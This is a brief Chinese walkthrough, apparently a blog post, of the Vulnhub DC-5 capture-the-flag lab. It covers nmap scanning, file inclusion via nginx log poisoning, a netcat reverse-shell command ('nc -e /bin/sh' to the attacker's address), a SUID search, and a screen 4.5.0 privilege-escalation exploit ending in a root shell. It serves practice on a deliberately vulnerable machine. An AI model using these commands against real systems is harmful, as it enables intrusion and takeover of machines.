Vulnhub靶机 DC-5

Vulnhub靶机 DC-5_第1张图片
先找到靶机
然后扫一下

nmap -sP 192.168.0.0/24
nmap -sV 192.168.0.149

Vulnhub靶机 DC-5_第2张图片
Vulnhub靶机 DC-5_第3张图片
Vulnhub靶机 DC-5_第4张图片
发现底下的年份一直再变,怀疑文件包含漏洞

Vulnhub靶机 DC-5_第5张图片

Vulnhub靶机 DC-5_第6张图片
写个phpinfo试一下
返回phpinfo页面
成功

<?php phpinfo();?>

在这里插入图片描述
Vulnhub靶机 DC-5_第7张图片

监听端口
nc建立连接

nc -nlvp 4444
/thankyou.php?file=/var/log/nginx/access.log&cmd=nc -e /bin/sh 192.168.0.128 4444
http://192.168.0.149/thankyou.php?file=/var/log/nginx/access.log


Vulnhub靶机 DC-5_第8张图片
查看root权限
发现screen-4.5.0

find / -perm -u=s -type f 2>/dev/null

Vulnhub靶机 DC-5_第9张图片

在这里插入图片描述
找一下漏洞

searchsploit screen 4.5

Vulnhub靶机 DC-5_第10张图片

在这里插入图片描述

打开41154.txt,根据提示做出3个文件

在这里插入图片描述

打开apache,准备wget传输文件

/etc/init.d/apache2 start

Vulnhub靶机 DC-5_第11张图片
Vulnhub靶机 DC-5_第12张图片
下载文件之前建立反射shell

python -c 'import pty;pty.spawn("/bin/bash")'
wget 文件名

Vulnhub靶机 DC-5_第13张图片
利用文件
忘了截图了,偷一张~

./rootshell

拿到flag!!!

你可能感兴趣的:(vulnhub)